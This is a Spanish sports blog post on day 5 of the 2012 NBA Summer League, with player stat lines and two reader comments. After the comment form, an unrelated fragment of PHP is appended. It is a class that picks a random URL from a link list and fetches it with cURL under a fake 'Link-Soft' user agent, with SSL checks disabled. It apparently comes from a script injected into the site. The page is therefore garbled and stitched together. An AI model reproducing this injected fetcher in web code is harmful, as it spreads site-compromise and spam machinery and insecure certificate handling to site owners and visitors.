SummerLeague: Día 5

14 de July de 2012 por txusma

Último día de la Summer League de Orlando y primero de la de Las Vegas. Si tenemos que destacar una noticia es que los Charlotte Bobcats ganaron y lo hicieron anotando 121 puntos. ¡El verano! Un par de anécdotas: Jan Vesely hizo 10 faltas (y consiguió un doble-doble) y los Lakers se quedaron en 50 puntos…

Destacados

MarShon Brooks: El jugador de los Nets abrió la semana con un 0 de 10 y la cierra con un 13 de 27 y 34 puntos. La pelota fue suya en todo momento y dominó el partido a su antojo. A parte de los 34 puntos, repartió 6 asistencias.

E’Twaun Moore: El escolta de Boston ha jugado de base durante toda la summerleague y lo ha hecho bastante bien. Se ha despedido con 18 puntos (3 de 4 en triples), 3 robos y un buen tono defensivo.

Kim English: El jugador de los Pistons es un anotador puro y este año puede tener minutos tras la salida de Ben Gordon. Anoche liquidó a los Sixers con 17 puntos y un 4 de 7 en triples.

Chris Singleton: 20 puntos, 8 rebotes, 4 robos y 2 tapones. El alero de los Wizards jugó un partido completísimo.

Donatas Motiejunas: 25 puntos y 9 rebotes para el pívot lituano. No tuvo rival en la pintura.

Michael Kidd-Gilchrist: Fenomenal estreno de la 2ª elección del draft. 18 puntos, 8 rebotes, 5 asistencias y 4 robos. Completísimo.

Klay Thompson: Hago lo que quiero como quiero y cuando quiero. El escolta de los Warriors fue un una pesadilla para los Lakers con sus 24 puntos, 6 rebotes y 5 asistencias en 22 minutos.

A seguir

Enes Kanter: El jugador de los Jazz ha jugado una buena summerleague si eliminamos el primer partido. Anoche anotó 15 puntos y capturó 8 rebotes, 7 de ellos ofensivos.

Andre Drummond: Día relajado para el pívot de los Pistons. 6 puntos y 2 rebotes en 16 minutos.

Tornike Shengelia: Otro buen partido del jugador georgiano. 16 puntos saliendo desde el banco. Los Nets pueden invitarle al training camp que no desentonará.

John Jenkins: Primer partido en Las Vegas del jugador de los Hawks. El ex de Vanderbilt ofreció lo que se espera de él: 19 puntos con 4 de 5 en triples.

Bradley Beal: 22 puntos con un 6 de 14 en tiro pero poca incidencia en el resto de apartados.

Tomas Satoranski: El checo disfrutó de 15 minutos en los que anotó 4 puntos.

Jeremy Lamb: Buen debut del ex de Uconn con 16 puntos.

Terrence Ross: El nuevo escolta de los Raptors empieza su andadura con 21 puntos pero un 8 de 19 en tiros de campo.

Ed Davis: El ala-pívot de los Raptors tiene ante sí una temporada importante. Tras una 2ª temporada un tanto decepcionante busca reivindicarse. Ha empezado con 18 puntos y 8 rebotes.

Harrison Barnes: 23 puntos para el alero de los Warriors.

Draymond Green: El ex de los Spartans consiguió 9 puntos, 9 rebotes y 2 asistencias. Un todoterreno que será muy valioso para GS.

Thomas Robinson: Empieza su andadura en los Kings con 19 puntos y 5 reboetes.

Terrence Jones: El alero de los Rockets se fue a los 17 puntos y 9 rebotes.

Kemba Walker: El que ha de ser uno de los líderes de los nuevos Bobcats anotó 16 puntos y repartió 7 asistencias.

BJ Mullens: Parece increíble pero Mullens sigue dejando buenos partidos. Anoche fueron 20 puntos y  7 rebotes.

Decepciones

Andrew Nicholson: Se le ha hecho larga la semana al jugador de los Magic. Ha acabado con 4 puntos, 6 rebotes y 3 pérdidas en 23 minutos. Ahora toca descansar.

Lavoy Allen: Una de las sorpresas de la temporada en la NBA no ha tenido una buena semana. El jugador de los Sixers perdió 4 balones en apenas 17 minutos.

Jimmer Fredette: 7 puntos con un 2 de 11 en tiro. Si no eres capaz de destacar en una Summerleague…

LA Lakers: En pleno. 50 puntos entre todos. Mal Eyenga, mal Sacre, mal Goudelock…

Comenta

2 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Tb Royce White jugó mediocre, y efectivamente, eso es lo que se está diciendo de Fredette. Ayer lo puso Smart de base, como pide Melo… pero olvidémonos, es un pérdida de tiempo buscar cualidades de base en un tirador puro como él. Otra cosa es que no pueda defender a nadie desde la posición de escolta. Este tipo se reduce a un jugador de rol anotador puro, para obrar milagros desde el banquillo o para correr, nada más. Una decepción como un piano, pero bueno, vosotros decís que hay que darle un segundo año. Se lo daremos. Total, no importa nada en los Kings lo de regalar minutos…

      Citar

  2. Esteban dice:
    #2

    estoy ansioso por ver en accion a waiters, a ver que vieron los cavs en el, realmente debe ser muy bueno para ser elegido por sobre robinson, barnes ross y lamb, q estan mostrando unas condiciones envidiables

    mas juegos como estos dos de lamb, y montiejunas (pesimo ayer, pero genial el viernes) y orlando va a estar muy tentado de traspasar a howard por esos muchachos, a lamb le veo pinta de crack enserio, puede ser de los mejores 3 de esta generacion en unos años

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>